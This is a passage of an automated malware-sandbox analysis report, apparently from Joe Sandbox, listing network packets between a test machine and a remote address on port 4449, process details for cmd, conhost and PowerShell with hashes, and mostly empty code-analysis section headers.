Apr 20, 2024 10:09:54.638366938 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:09:54.881268024 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:10:01.488622904 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:10:01.740128994 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:10:01.744214058 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:10:01.946973085 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:10:02.088129044 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:10:02.266036987 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:10:02.268217087 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:10:02.290721893 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:10:02.292213917 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:10:02.628458023 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:10:02.878638029 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Apr 20, 2024 10:10:02.878731966 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.128 |
Apr 20, 2024 10:10:03.120935917 CEST | 4449 | 49730 | 193.222.96.128 | 192.168.2.4 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 10:05:55 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61b9b0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 10:05:55 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 10:05:55 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61b9b0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 3 |
Start time: | 10:05:55 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 10:05:55 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61b9b0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 10:05:55 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 10:05:58 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage: | 1.5% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 8 |
Total number of Limit Nodes: | 1 |
Graph
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD9B9715DD Relevance: .7, Instructions: 669COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |